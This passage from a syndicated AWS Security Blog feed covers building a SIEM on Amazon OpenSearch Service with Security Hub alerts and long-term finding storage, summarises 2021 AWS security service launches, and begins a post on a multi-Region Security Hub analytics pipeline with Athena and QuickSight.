The solution represented in Figure 1 shows the flexibility of integrations that are possible when you create a SIEM by using Amazon OpenSearch Service. The solution allows you to aggregate findings across multiple accounts, store findings in an S3 bucket indefinitely, and correlate multiple AWS and non-AWS services in one place for visualization. This post focuses on Security Hub’s integration with the solution, but the following AWS services are also able to integrate:

Each of these services has its own dedicated dashboard within the OpenSearch SIEM solution. This makes it possible for customers to view findings and data that are relevant to each service that the SIEM tool is ingesting. OpenSearch Service also allows the customer to create aggregated dashboards, consolidating multiple services within a single dashboard, if needed.

Prerequisites

We recommend that you enable Security Hub and AWS Config across all of your accounts and Regions. For more information about how to do this, see the documentation for Security Hub and AWS Config. We also recommend that you use Security Hub and AWS Config integration with AWS Organizations to simplify the setup and automatically enable these services in all current and future accounts in your organization.
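If you prefer to script this setup, the following boto3 sketch shows the organization-level Security Hub calls; the account ID and profile name are placeholders, and the first call must run from the Organizations management account.

    import boto3

    securityhub = boto3.client("securityhub")

    # Delegate Security Hub administration to a dedicated account.
    securityhub.enable_organization_admin_account(AdminAccountId="111122223333")

    # From the delegated administrator account, auto-enable Security Hub
    # in all current and future member accounts.
    admin = boto3.Session(profile_name="security-admin").client("securityhub")
    admin.update_organization_configuration(AutoEnable=True)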

Launch the solution

In order to launch this solution within your environment, you can either launch it by using an AWS CloudFormation template, or you can follow the steps presented later in this post to customize the deployment to support integrations with non-AWS services or multi-organization deployments, or to launch it within your existing OpenSearch Service environment.

To launch the solution, follow the instructions for SIEM on Amazon OpenSearch Service on GitHub.

Use the solution

Before you start using the solution, we’ll show you how this solution appears in the Security Hub dashboard, as shown in Figure 2. Navigate here by following Step 3 from the GitHub README.

Figure 2: Pre-built dashboards within solution

The Security Hub dashboard highlights all major components of the service within an OpenSearch Service dashboard environment. This includes supporting all of the service integrations that are available within Security Hub (such as GuardDuty, AWS Identity and Access Management (IAM) Access Analyzer, Amazon Inspector, Amazon Macie, and AWS Systems Manager Patch Manager). The dashboard displays both findings and security standards, and you can filter by AWS account, finding type, security standard, or service integration. Figure 3 shows an overview of the visual dashboard experience when you deploy the solution.

Figure 3: Dashboard preview

Use case 1: Correlate Security Hub findings with each other and other log sources and create alerts

This solution uses OpenSearch Service and Kibana to allow you to search through both Security Hub findings and logs from any other AWS and non-AWS systems. You can then create alerts within Kibana based on interesting correlations between Security Hub and any other logged events. Although Security Hub supports ingesting a vast number of integrations and findings, it cannot create correlation rules like a SIEM tool can. However, you can create such rules using SIEM on OpenSearch Service. It’s important to take a closer look when multiple AWS security services generate findings for a single resource, because this potentially indicates elevated risk or multiple risk vectors. Depending on your environment, the initial number of findings in Security Hub may be high, so you may need to prioritize which findings require immediate action. Security Hub natively gives you the ability to filter findings by resource, account, severity, and many other details.

As part of the findings, you can send notifications for alerts that are generated by SIEM on OpenSearch Service in several ways: through Amazon Simple Notification Service (Amazon SNS), by consuming the messages in an appropriate tool or configuring recipient email addresses; through Amazon Chime or Slack (using AWS Chatbot); or through a custom webhook to your organization's ticketing system. You can then respond to these new security incident-oriented findings through ticketing, chat, or incident management systems.

Solution overview for use case 1

Figure 4: Solution overview diagram

Figure 4 gives an overview of the solution for use case 1. This solution requires that you have Security Hub and GuardDuty enabled in your AWS account. Logs from AWS services, including Security Hub, are ingested into an S3 bucket, and an AWS Lambda function automatically extracts, transforms, and loads (ETL) them into the SIEM system running on OpenSearch Service. After capturing the logs, you will be able to visualize them on the dashboard and analyze correlations across multiple logs. Within the SIEM on OpenSearch Service solution, you will create a rule to detect failures in the logs, such as CloudTrail authentication failures. Then, you will configure the solution to publish alerts to Amazon SNS and send emails when logs match rules.

Implement the solution for use case 1

You will now set up this workflow to alert you by email when logs in OpenSearch match certain rules that you create.

Step 1: Create and visualize findings in OpenSearch Dashboards

Security Hub and other AWS services export findings to Amazon S3 in a centralized log bucket. You can ingest logs from CloudTrail, VPC Flow Logs, and GuardDuty, which are often used in AWS security analytics. In this step, you import simulated security incident data into OpenSearch Dashboards and use the dashboard to visualize the data in the logs.

To navigate OpenSearch Dashboards

  1. Generate pseudo-security incidents. You can simulate the results by generating sample findings in GuardDuty.
  2. In OpenSearch Dashboards, go to the Discover screen. The Discover screen is divided into three major sections: Search bar, index/display field list, and time-series display, as shown in Figure 5.
    Figure 5: OpenSearch Dashboards

  3. In OpenSearch Dashboards, select log-aws-securityhub-*, log-aws-vpcflowlogs-*, log-aws-cloudtrail-*, or any other index pattern, and add event.module to the display fields. event.module is a field that indicates where the log originated from. If you are collecting other threat information through Security Hub, @log-type is Security Hub and event.module indicates the originating service (for example, Amazon Inspector or Amazon Macie). After you have added event.module, filter for the desired Security Hub integrated service (for example, Amazon Inspector) to display. When testing the environment covered in this blog post outside a production context, you can use Kinesis Data Generator to generate sample user traffic; other tools are also available.
  4. Select the following on the dashboard to see the visualized information:
    • CloudTrail Summary
    • VpcFlowLogs Summary
    • GuardDuty Summary
    • All – Threat Hunting

Step 2: Configure alerts to match log criteria

Next, you will configure alerts to match log criteria. First you need to set the destination for alerts, and then set what to monitor.

To configure alerts

  1. In OpenSearch Dashboards, in the left menu, choose Alerting.
  2. To add the details of SNS, on the Destinations tab, choose Add destinations, and enter the following parameters:
    • Name: aes-siem-alert-destination
    • Type: Amazon SNS
    • SNS Alert: arn:aws:sns:<AWS-REGION>:<111111111111>:aes-siem-alert
      • Replace <111111111111> with your AWS account ID and correct the Region name
      • Replace <AWS-REGION> with the Region you are using, for example, eu-west-1
    • IAM Role ARN: arn:aws:iam::<111111111111>:role/aes-siem-sns-role
      • Replace &<111111111111> with your AWS account ID
  3. Choose Create to complete setting the alert destination.
    Figure 6: Edit alert destination

  4. In OpenSearch Dashboards, in the left menu, select Alerting. You will now set what to monitor; here, you monitor CloudTrail authentication failures. There are two normalized log time fields: @timestamp, the log occurrence time, and event.ingested, the SIEM reception time. Use event.ingested for logs with a large time lag between occurrence and reception. You can specify flexible conditions by selecting Define using extraction query for the filter definition.
  5. On the Monitors tab, choose Create monitor.
  6. Enter the following parameters. If there is no description, use the default value.
    • Name: Authentication failed
    • Method of definition: Define using extraction query
    • Indices: log-aws-cloudtrail-* (manual input, not pull-down)
    • Define extraction query: Enter the following query.
      {
          "query": {
              "bool": {
                  "filter": [
                      {"term": {"eventSource": "signin.amazonaws.com"}},
                      {"term": {"event.outcome": "failure"}},
                      {
                          "range": {
                              "event.ingested": {
                                  "from": "{{period_end}}||-20m",
                                  "to": "{{period_end}}"
                              }
                          }
                      }
                  ]
              }
          }
      }

  7. Enter the following remaining parameters of the monitor:
    • Frequency: By interval
    • Monitor schedule: Every 3 minutes
  8. Choose Create to create the monitor.

Step 3: Set up trigger to send email via Amazon SNS

Now you will set the alert firing condition, known as the trigger. This is the setting for alerting when the monitored conditions (Monitors) are met. By default, the alert will be triggered if the number of hits is greater than 0. In this step, you will not change that; you will only give the trigger a name.

To set up the trigger

  1. Select Create trigger and for Trigger name, enter Authentication failed trigger.
  2. Scroll down to Configure actions.
    Figure 7: Create trigger

  3. Set what the trigger should do (the action). In this case, you want to publish to SNS. Set the following parameters for the body of the email:
    • Action name: Authentication failed action
    • Destination: Choose aes-siem-alert-destination – (Amazon SNS)
    • Message subject: (SIEM) Auth failure alert
    • Action throttling: Select Enable action throttling, and set throttle action to only trigger every 10 minutes.
    • Message: Copy and paste the following message into the text box. After pasting, choose Send test message at the bottom right of the screen to confirm that you can receive the test email.

      Monitor {{ctx.monitor.name}} just entered alert status. Please investigate the issue.
      Trigger: {{ctx.trigger.name}}
      Severity: {{ctx.trigger.severity}}
      @timestamp: {{ctx.results.0.hits.hits.0._source.@timestamp}}
      event.action: {{ctx.results.0.hits.hits.0._source.event.action}}
      error.message: {{ctx.results.0.hits.hits.0._source.error.message}}
      count: {{ctx.results.0.hits.total.value}}
      source.ip: {{ctx.results.0.hits.hits.0._source.source.ip}}
      source.geo.country_name: {{ctx.results.0.hits.hits.0._source.source.geo.country_name}}

    Figure 8: Configure actions

  4. You will receive an alert email in a few minutes. You can check the occurrence status, including the history, by the following method:
    1. In OpenSearch Dashboards, on the left menu, choose Alerting.
    2. On the Monitors tab, choose Authentication failed.
    3. You can check the status of the alert in the History pane.
    Figure 9: Email alert

Use case 1 shows you how to correlate various Security Hub findings through this OpenSearch Service SIEM solution. However, you can take the solution a step further and build more complex correlation checks by following the procedure in the blog post Correlate security findings with AWS Security Hub and Amazon EventBridge. This information can then be ingested into this OpenSearch Service SIEM solution for viewing on a single screen.

Use case 2: Store findings for longer than 90 days after last update date

Security Hub has a maximum storage time of 90 days for events, but your organization might require data storage beyond that period, with flexibility to specify a custom retention period to meet your needs. The SIEM on Amazon OpenSearch Service solution creates a centralized S3 bucket where findings from Security Hub and various other services are collected and stored, and this bucket can be configured to store data as long as you require. The S3 bucket can persist data indefinitely, or you can create an S3 object lifecycle policy to set a custom retention timeframe. Lifecycle policies allow you to either transition objects between S3 storage classes or delete objects after a specified period. Alternatively, you can use S3 Intelligent-Tiering to allow the Amazon S3 service to move data between tiers, based on user access patterns.

Either lifecycle policies or S3 Intelligent-Tiering will allow you to optimize costs for data that is stored in S3, to keep data for archive or backup purposes when it is no longer available in Security Hub or OpenSearch Service. Within the solution, this centralized bucket is called aes-siem-xxxxxxxx-log and is configured to store data for OpenSearch Service to consume indefinitely. The Amazon S3 User Guide has instructions for configuring an S3 lifecycle policy that is explicitly defined by the user on the centralized bucket. Or you can follow the instructions for configuring intelligent tiering to allow the S3 service to manage which tier data is stored in automatically. After data is archived, you can use Amazon Athena to query the S3 bucket for historical information that has been removed from OpenSearch Service, because this S3 bucket acts as a centralized security event repository.
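As one example, the following boto3 sketch applies a lifecycle policy to the solution's centralized bucket that archives findings to S3 Glacier after 90 days and deletes them after two years; the bucket name below is a placeholder (the solution generates a unique name), and you should adjust the periods to your retention requirements.

    import boto3

    s3 = boto3.client("s3")

    # Archive findings after 90 days and expire them after two years.
    s3.put_bucket_lifecycle_configuration(
        Bucket="aes-siem-xxxxxxxx-log",  # placeholder; use your bucket name
        LifecycleConfiguration={
            "Rules": [
                {
                    "ID": "archive-then-expire-findings",
                    "Status": "Enabled",
                    "Filter": {"Prefix": ""},
                    "Transitions": [{"Days": 90, "StorageClass": "GLACIER"}],
                    "Expiration": {"Days": 730},
                }
            ]
        },
    )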

Use case 3: Aggregate findings across multiple administrator accounts

There are cases where you might have multiple Security Hub administrator accounts within one or multiple organizations. For these use cases, you can consolidate findings across these multiple Security Hub administrator accounts into a single S3 bucket for centralized storage, archive, backup, and querying. This gives you the ability to create a single SIEM on OpenSearch Service to minimize the number of monitoring tools you need. In order to do this, you can use S3 replication to automatically copy findings to a centralized S3 bucket. You can follow this detailed walkthrough on how to set up the correct bucket permissions in order to allow replication between the accounts. You can also follow this related blog post to configure cross-Region Security Hub findings that are centralized in a single S3 bucket, if cross-Region replication is appropriate for your security needs. With cross-account S3 replication set up for Security Hub archived event data, you can import data from the centralized S3 bucket into OpenSearch Service by using the Lambda function within the solution in this blog post. This Lambda function automatically normalizes and enriches the log data and imports it into OpenSearch Service, so that users only need to configure data storage in the S3 bucket, and the Lambda function will automatically import the data.
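The following boto3 sketch shows what the replication configuration for each administrator account's bucket might look like; the role ARN, account IDs, and bucket names are placeholders, versioning must already be enabled on both buckets, and the linked walkthrough covers the required permissions.

    import boto3

    s3 = boto3.client("s3")  # run in each Security Hub administrator account

    # Replicate this account's findings bucket into the central bucket.
    s3.put_bucket_replication(
        Bucket="member-findings-bucket",
        ReplicationConfiguration={
            "Role": "arn:aws:iam::111122223333:role/findings-replication-role",
            "Rules": [
                {
                    "ID": "replicate-findings-to-central",
                    "Status": "Enabled",
                    "Priority": 1,
                    "Filter": {},
                    "DeleteMarkerReplication": {"Status": "Disabled"},
                    "Destination": {
                        "Bucket": "arn:aws:s3:::central-findings-bucket",
                        "Account": "444455556666",
                        "AccessControlTranslation": {"Owner": "Destination"},
                    },
                }
            ],
        },
    )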

Conclusion

In this blog post, we showed how you can use Security Hub with a SIEM to store findings for longer than 90 days, aggregate findings across multiple administrator accounts, and correlate Security Hub findings with each other and other log sources. We used the solution to walk through building the SIEM and explained how Security Hub could be used within that solution to add greater flexibility. This post describes one solution to create your own SIEM using OpenSearch Service; however, we also recommend that you read the blog post Visualize AWS Security Hub Findings using Analytics and Business Intelligence Tools, in order to see a different method of consolidating and visualizing insights from Security Hub.

To learn more, you can also try out this solution through the new SIEM on AWS OpenSearch Service workshop.

If you have feedback about this blog post, submit comments in the Comments section below. If you have questions about this blog post, please start a new thread on the Security Hub forum or contact AWS Support.

 

Want more AWS Security news? Follow us on Twitter.

Ely Kahn

Ely Kahn is the Principal Product Manager for AWS Security Hub. Before his time at AWS, Ely was a co-founder for Sqrrl, a security analytics startup that AWS acquired and is now Amazon Detective. Earlier, Ely served in a variety of positions in the federal government, including Director of Cybersecurity at the National Security Council in the White House.

Anthony Pasquariello

Anthony Pasquariello is a Senior Solutions Architect at AWS based in New York City. He specializes in modernization and security for our advanced enterprise customers. Anthony enjoys writing and speaking about all things cloud. He’s pursuing an MBA, and received his MS and BS in Electrical & Computer Engineering.

Aashmeet Kalra

Aashmeet Kalra is a Principal Solutions Architect working in the Global and Strategic team at AWS in San Francisco. Aashmeet has over 17 years of experience designing and developing innovative solutions for customers globally. She specializes in advanced analytics, machine learning and builder/developer experience.

Grant Joslyn

Grant Joslyn is a solutions architect for the US state and local government public sector team at Amazon Web Services (AWS). He specializes in end user compute and cloud automation. He provides technical and architectural guidance to customers building secure solutions on AWS. He is a subject matter expert and thought leader for strategic initiatives that help customers embrace DevOps practices.

Akihiro Nakajima

Akihiro Nakajima is a Senior Solutions Architect, Security Specialist at Amazon Web Services Japan. He has more than 20 years of experience in security, specifically focused on incident analysis and response, threat hunting, and digital forensics. He leads development of open-source software, “SIEM on Amazon OpenSearch Service”.

Top 2021 AWS Security service launches security professionals should review – Part 1

Post Syndicated from Ryan Holland original https://aws.amazon.com/blogs/security/top-2021-aws-security-service-launches-part-1/

Given the speed of Amazon Web Services (AWS) innovation, it can sometimes be challenging to keep up with AWS Security service and feature launches. To help you stay current, here’s an overview of some of the most important 2021 AWS Security launches that security professionals should be aware of. This is the first of two related posts; Part 2 will highlight some of the important 2021 launches that security professionals should be aware of across all AWS services.

Amazon GuardDuty

In 2021, the threat detection service Amazon GuardDuty expanded the internal AWS security intelligence it consumes to use more of the intel that AWS internal threat detection teams collect, including additional nation-state threat intelligence. Sharing more of the important intel that internal AWS teams collect lets you quickly improve your protection. GuardDuty also launched domain reputation modeling. These machine learning models take all the domain requests from across all of AWS, and feed them into a model that allows AWS to categorize previously unseen domains as highly likely to be malicious or benign based on their behavioral characteristics. In practice, AWS is seeing that these models often deliver high-fidelity threat detections, identifying malicious domains 7–14 days before they are identified and available on commercial threat feeds.

AWS also launched second generation anomaly detection for GuardDuty. Shortly after the original GuardDuty launch in 2017, AWS added additional anomaly detection for user behavior analytics and monitoring for unusual activity of AWS Identity and Access Management (IAM) users. After receiving customer feedback that the original feature was a little too noisy, and that it was difficult to understand why some findings were generated, the GuardDuty analytics team rebuilt this functionality on an entirely new machine learning model, considerably reducing the number of detections and generating a more accurate positive-detection rate. The new model also added additional context that security professionals (such as analysts) can use to understand why the model shows findings as suspicious or unusual.

Since its introduction, GuardDuty has been able to detect when Amazon EC2 instance role credentials are used to call AWS APIs from IP addresses outside of AWS. Beginning in early 2022, GuardDuty can also detect when credentials are used from other AWS accounts, inside the AWS network. This is a complex problem for customers to solve on their own, which is why the GuardDuty team added this enhancement. The solution accounts for legitimate reasons why the source IP address calling AWS service APIs might differ from the Amazon Elastic Compute Cloud (Amazon EC2) instance's IP address or the NAT gateway associated with the instance's VPC. The enhancement also considers complex network topologies that route traffic to one or multiple VPCs—for example, AWS Transit Gateway or AWS Direct Connect.

Our customers are increasingly running container workloads in production; helping to raise the security posture of these workloads became an AWS development priority in 2021. GuardDuty for EKS Protection is one recent feature that has resulted from this investment. This new GuardDuty feature monitors Amazon Elastic Kubernetes Service (Amazon EKS) cluster control plane activity by analyzing Kubernetes audit logs. GuardDuty is integrated with Amazon EKS, giving it direct access to the Kubernetes audit logs without requiring you to turn on or store these logs. Once a threat is detected, GuardDuty generates a security finding that includes container details such as pod ID, container image ID, and associated tags. See below for details on how the new Amazon Inspector is also helping to protect containers.

Amazon Inspector

At AWS re:Invent 2021, we launched the new Amazon Inspector, a vulnerability management service that continually scans AWS workloads for software vulnerabilities and unintended network exposure. The original Amazon Inspector was completely re-architected in this release to automate vulnerability management and to deliver near real-time findings to minimize the time needed to discover new vulnerabilities. This new Amazon Inspector has simple one-click enablement and multi-account support using AWS Organizations, similar to our other AWS Security services. This launch also introduces a more accurate vulnerability risk score, called the Inspector score. The Inspector score is a highly contextualized risk score that is generated for each finding by correlating Common Vulnerability and Exposures (CVE) metadata with environmental factors for resources such as network accessibility. This makes it easier for you to identify and prioritize your most critical vulnerabilities for immediate remediation. One of the most important new capabilities is that Amazon Inspector automatically discovers running EC2 instances and container images residing in Amazon Elastic Container Registry (Amazon ECR), at any scale, and immediately starts assessing them for known vulnerabilities. Now you can consolidate your vulnerability management solutions for both Amazon EC2 and Amazon ECR into one fully managed service.

AWS Security Hub

In addition to a significant number of smaller enhancements throughout 2021, in October AWS Security Hub, an AWS cloud security posture management service, addressed a top customer enhancement request by adding support for cross-Region finding aggregation. You can now view all your findings from all accounts and all selected Regions in a single console view, and act on them from an Amazon EventBridge feed in a single account and Region. Looking back at 2021, Security Hub added 72 additional best practice checks, four new AWS service integrations, and 13 new external partner integrations. A few of these integrations are Atlassian Jira Service Management, Forcepoint Cloud Security Gateway (CSG), and Amazon Macie. Security Hub also achieved FedRAMP High authorization to enable security posture management for high-impact workloads.

Amazon Macie

Based on customer feedback, data discovery tool Amazon Macie launched a number of enhancements in 2021. One new feature, which made it easier to manage Amazon Simple Storage Service (Amazon S3) buckets for sensitive data, was criteria-based bucket selection. This Macie feature allows you to define runtime criteria to determine which S3 buckets should be included in a sensitive data-discovery job. When a job runs, Macie identifies the S3 buckets that match your criteria, and automatically adds or removes them from the job’s scope. Before this feature, once a job was configured, it was immutable. Now, for example, you can create a policy where if a bucket becomes public in the future, it’s automatically added to the scan, and similarly, if a bucket is no longer public, it will no longer be included in the daily scan.
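
To illustrate what criteria-based bucket selection can look like, here is a hedged boto3 sketch of a scheduled classification job that is scoped at runtime to publicly accessible buckets. The job name and schedule are examples, and you should verify the criterion shape against the current Macie API.

import boto3

macie = boto3.client('macie2')

# Example job: the scope is re-evaluated at runtime, so buckets that
# become public are picked up automatically, and buckets that are no
# longer public drop out of the job's scope
macie.create_classification_job(
    jobType='SCHEDULED',
    name='daily-public-bucket-scan',  # example name
    scheduleFrequency={'dailySchedule': {}},
    s3JobDefinition={
        'bucketCriteria': {
            'includes': {
                'and': [
                    {
                        'simpleCriterion': {
                            'comparator': 'EQ',
                            'key': 'S3_BUCKET_EFFECTIVE_PERMISSION',
                            'values': ['PUBLIC'],
                        }
                    }
                ]
            }
        }
    },
)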

Originally, Macie included all available managed data identifiers in every scan. However, customers wanted more surgical search criteria; for example, they didn't want to be alerted about data types that are expected in a particular environment. In September 2021, Macie launched the ability to enable or disable managed data identifiers. This allows you to customize the data types you deem sensitive and would like Macie to alert on, in accordance with your organization's data governance and privacy needs.

Amazon Detective

Amazon Detective is a service to analyze and visualize security findings and related data to rapidly get to the root cause of potential security issues. In January 2021, Amazon Detective added a convenient, time-saving integration that allows you to start security incident investigation workflows directly from the GuardDuty console. This new hyperlink pivot in the GuardDuty console takes findings directly from the GuardDuty console into the Detective console. Another time-saving capability added was the IP address drill down functionality. This new capability can be useful to security forensic teams performing incident investigations, because it helps quickly determine the communications that took place from an EC2 instance under investigation before, during, and after an event.

In December 2021, Detective added support for AWS Organizations to simplify management for security operations and investigations across all existing and future accounts in an organization. This launch allows new and existing Detective customers to onboard and centrally manage the Detective graph database for up to 1,200 AWS accounts.

AWS Key Management Service

In June 2021, AWS Key Management Service (AWS KMS) introduced multi-Region keys, a capability that lets you replicate keys from one AWS Region into another. With multi-Region keys, you can more easily move encrypted data between Regions without having to decrypt and re-encrypt with different keys for each Region. Multi-Region keys are supported for client-side encryption using direct AWS KMS API calls, or in a simplified manner with the AWS Encryption SDK and Amazon DynamoDB Encryption Client.
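
For example, creating and replicating a multi-Region key takes two API calls, sketched below with boto3; the Regions and description are placeholders.

import boto3

# Create a multi-Region primary key in us-east-1
kms = boto3.client('kms', region_name='us-east-1')
key = kms.create_key(
    Description='Example multi-Region primary key',
    MultiRegion=True,
)

# Replicate the primary key into us-west-2; the replica shares key
# material with the primary, so ciphertext is portable between Regions
kms.replicate_key(
    KeyId=key['KeyMetadata']['KeyId'],
    ReplicaRegion='us-west-2',
)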

AWS Secrets Manager

Last year was a busy year for AWS Secrets Manager, with four feature launches to make it easier to manage secrets at scale, not just for client applications, but also for platforms. In March 2021, Secrets Manager launched multi-Region secrets to automatically replicate secrets for multi-Region workloads. Also in March, Secrets Manager added three new rules to AWS Config, to help administrators verify that secrets in Secrets Manager are configured according to organizational requirements. Then in April 2021, Secrets Manager added a CSI driver plug-in, to make it easy to consume secrets from Amazon EKS by using Kubernetes’s standard Secrets Store interface. In November, Secrets Manager introduced a higher secret limit of 500,000 per account to simplify secrets management for independent software vendors (ISVs) that rely on unique secrets for a large number of end customers. Although launched in January 2022, it’s also worth mentioning Secrets Manager’s release of rotation windows to align automatic rotation of secrets with application maintenance windows.

Amazon CodeGuru and Secrets Manager

In November 2021, AWS announced a new secrets detector feature in Amazon CodeGuru that searches your codebase for hardcoded secrets. Amazon CodeGuru is a developer tool powered by machine learning that provides intelligent recommendations to detect security vulnerabilities, improve code quality, and identify an application’s most expensive lines of code.

This new feature can pinpoint locations in your code with usernames and passwords; database connection strings, tokens, and API keys from AWS; and other service providers. When a secret is found in your code, CodeGuru Reviewer provides an actionable recommendation that links to AWS Secrets Manager, where developers can secure the secret with a point-and-click experience.

Looking ahead for 2022

AWS will continue to deliver experiences in 2022 that meet administrators where they govern, developers where they code, and applications where they run. A lot of customers are moving to container and serverless workloads; you can expect to see more work on this in 2022. You can also expect to see more work around integrations, like CodeGuru Secrets Detector identifying plaintext secrets in code (as noted previously).

To stay up-to-date in the year ahead on the latest product and feature launches and security use cases, be sure to read the Security service launch announcements. Additionally, stay tuned to the AWS Security Blog for Part 2 of this blog series, which will provide an overview of some of the important 2021 launches that security professionals should be aware of across all AWS services.

If you’re looking for more opportunities to learn about AWS security services, check out AWS re:Inforce, the AWS conference focused on cloud security, identity, privacy, and compliance, which will take place June 28-29 in Houston, Texas.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

Want more AWS Security news? Follow us on Twitter.

Ryan Holland

Ryan is a Senior Manager with GuardDuty Security Response. His team is responsible for ensuring GuardDuty provides the best security value to customers, including threat intelligence, behavioral analytics, and finding quality.

Marta Taggart

Marta is a Seattle-native and Senior Product Marketing Manager in AWS Security Product Marketing, where she focuses on data protection services. Outside of work you’ll find her trying to convince Jack, her rescue dog, not to chase squirrels and crows (with limited success).

How to build a multi-Region AWS Security Hub analytic pipeline and visualize Security Hub data

Post Syndicated from David Hessler original https://aws.amazon.com/blogs/security/how-to-build-a-multi-region-aws-security-hub-analytic-pipeline/

AWS Security Hub is a service that gives you aggregated visibility into your security and compliance posture across multiple Amazon Web Services (AWS) accounts. By joining Security Hub with Amazon QuickSight—a scalable, serverless, embeddable, machine learning-powered business intelligence (BI) service built for the cloud—your senior leaders and decision-makers can use dashboards to empower data-driven decisions and facilitate a secure configuration of AWS resources.

In organizations that operate at cloud scale, being able to summarize and perform trend analysis is key to identifying and remediating problems early, which leads to the overall success of the organization. Additionally, QuickSight dashboards can be embedded in dashboard and reporting platforms that leaders are already familiar with, making the dashboards even more user friendly.

With the solution in this blog post, you can provide leaders with cross-AWS Region views of data to enable decision-makers to assess the health and status of an organization's IT infrastructure at a glance. You also can enrich the dashboard with data sources not available to Security Hub. Finally, this solution allows you the flexibility to have multiple administrator accounts across several AWS organizations and combine them into a single view.

In this blog post, you will learn how to build an analytics pipeline of your Security Hub findings, summarize the data with Amazon Athena, and visualize the data via QuickSight using the following steps:

  • Deploy an AWS Cloud Development Kit (AWS CDK) stack that builds the infrastructure you need to get started.
  • Create an Athena view that summarizes the raw findings.
  • Visualize the summary of findings in QuickSight.
  • Secure QuickSight using best practices.

For a high-level discussion without code examples, please see Visualize AWS Security Hub Findings using Analytics and Business Intelligence Tools.

Prerequisites

This blog post assumes that you:

  • Have a basic understanding of how to authenticate and access your AWS account.
  • Are able to run commands via a command line prompt on your local machine.
  • Have a basic understanding of Structured Query Language (SQL).

Solution overview

Figure 1 shows the flow of events and a high-level architecture diagram of the solution.

Figure 1. High level architecture diagram

The steps shown in Figure 1 include:

  • Detect
  • Collect
  • Aggregate
  • Ingest
  • Transform
  • Analyze
  • Visualize

Detect

AWS offers a number of tools to help you detect security findings continuously, from built-in Security Hub standards to partner integrations and custom scanners.

In this blog, you will use two built-in security standards of Security Hub—CIS AWS Foundations Benchmark controls and AWS Foundational Security Best Practices Standard—and a serverless Prowler scanner that acts as a third-party partner product. In cases where AWS Organizations is used, member accounts send these findings to the member account's Security Hub.

Collect

Within a Region, security findings are centralized into a single administrator account by using Security Hub.

Aggregate

Using the cross-Region aggregation feature within Security Hub, findings within each administrator account can be aggregated and continuously synchronized across multiple Regions.

Ingest

Security Hub not only provides a comprehensive view of security alerts and security posture across your AWS accounts, it also acts as a data sink for your security tools. Any tool that can expose data via AWS Security Finding Format (ASFF) can use the BatchImportFindings API action to push data to Security Hub. For more details, see Using custom product integration to send findings to AWS Security Hub and Available AWS service integrations in the Security Hub User Guide.
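
As an illustration of this ingestion path, the following boto3 sketch pushes a minimal ASFF finding into Security Hub. The account ID, Region, and finding content are examples only; the ProductArn shown is the default product ARN that accounts can use for custom findings.

import boto3
from datetime import datetime, timezone

securityhub = boto3.client('securityhub', region_name='us-east-1')

account_id = '111122223333'  # example account ID
now = datetime.now(timezone.utc).isoformat()

# A minimal ASFF finding; all field values below are illustrative
finding = {
    'SchemaVersion': '2018-10-08',
    'Id': 'example-finding-001',
    'ProductArn': f'arn:aws:securityhub:us-east-1:{account_id}:product/{account_id}/default',
    'GeneratorId': 'example-custom-scanner',
    'AwsAccountId': account_id,
    'Types': ['Software and Configuration Checks'],
    'CreatedAt': now,
    'UpdatedAt': now,
    'Severity': {'Label': 'MEDIUM'},
    'Title': 'Example finding from a custom tool',
    'Description': 'Illustrates sending ASFF data with BatchImportFindings.',
    'Resources': [{'Type': 'AwsAccount', 'Id': f'AWS::::Account:{account_id}'}],
}

response = securityhub.batch_import_findings(Findings=[finding])
print(response['SuccessCount'], 'imported,', response['FailedCount'], 'failed')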

Transform

Data coming out of Security Hub is exposed via Amazon EventBridge. Unfortunately, it's not quite in a form that Athena can consume. EventBridge streams the data through Amazon Kinesis Data Firehose directly to Amazon Simple Storage Service (Amazon S3). From there, an AWS Lambda function flattens the data and fixes some of the column names, such as by removing special characters that Athena cannot recognize, and saves the results back to S3. Finally, an AWS Glue crawler dynamically discovers the schema of the data and creates or updates an Athena table.
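
The Lambda function deployed by the solution handles this transformation; as a rough illustration of the flattening step (not the solution's actual code), a sanitizer might look like the following, where the lowercase, alphanumeric-and-underscore naming rule is an assumption.

import re

def flatten(record, parent_key=''):
    """Flatten nested finding attributes and sanitize key names so that
    Athena can use them as column names."""
    items = {}
    for key, value in record.items():
        # Athena-friendly name: lowercase, alphanumerics and underscores only
        clean_key = re.sub(r'[^0-9a-zA-Z_]', '', key).lower()
        new_key = f'{parent_key}_{clean_key}' if parent_key else clean_key
        if isinstance(value, dict):
            items.update(flatten(value, new_key))
        else:
            items[new_key] = value
    return items

# flatten({'Severity': {'Label': 'HIGH'}, 'Record-State': 'ACTIVE'})
# returns {'severity_label': 'HIGH', 'recordstate': 'ACTIVE'}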

Analyze

You will aggregate the raw findings data and create metrics along various grains or pivots by creating a simple yet meaningful Athena view. With Athena, you also can use views to join the data with other data sources, such as your organization’s configuration management database (CMDB) or IT service management (ITSM) system.
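
As a sketch of what such a join could look like, the following boto3 snippet runs a query that combines the crawled findings table with a hypothetical cmdb_accounts table; the table, its columns, and the output location are assumptions for illustration.

import boto3

athena = boto3.client('athena')

# Hypothetical join: count distinct finding titles per application and
# severity, where cmdb_accounts maps AWS account IDs to applications
query = '''
SELECT c.application_name, f.severity_label, COUNT(DISTINCT f.title) AS cnt
FROM "security-hub-crawled-findings" f
JOIN cmdb_accounts c ON f.awsaccountid = c.account_id
GROUP BY c.application_name, f.severity_label
'''

athena.start_query_execution(
    QueryString=query,
    QueryExecutionContext={'Database': 'security_hub_database'},
    ResultConfiguration={'OutputLocation': 's3://analyticsink-queryresults-example/'},
)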

Visualize

Using QuickSight, you will register the data sources and build visualizations that can be used to identify areas where security can be improved or reduce risk. This post shares steps detailing how to do this in the Build QuickSight visualizations section below.

Use AWS CDK to deploy the infrastructure

In order to analyze and visualize security-related findings, you will need to deploy the infrastructure required to detect, ingest, and transform those findings. You will use an AWS CDK stack to deploy the infrastructure to your account. To begin, review the prerequisites to make sure you have everything you need to deploy the stack; then deploy the infrastructure with the AWS CDK. After the infrastructure has been deployed, you will build an Athena view and a QuickSight visualization.

Install the software to deploy the solution

For the solution in this blog post, you must have the following tools installed:

  • The solution in this blog post is written in Python, so you must install Python in addition to CDK. Instructions on how to install Python version 3.X can be found on their downloads page.
  • AWS CDK requires Node.js. Directions on how to install Node.js can be found on the Node.js downloads page.
  • This CDK application uses Docker for local bundling. Directions for using Docker can be found at Get Docker.
  • AWS CDK—a software-development framework for defining cloud infrastructure in code and provisioning it through AWS CloudFormation. To install CDK, visit the AWS CDK Toolkit page.

To confirm you have everything you need

  1. Confirm you are running version 1.108.0 or later of CDK.

    $ cdk --version

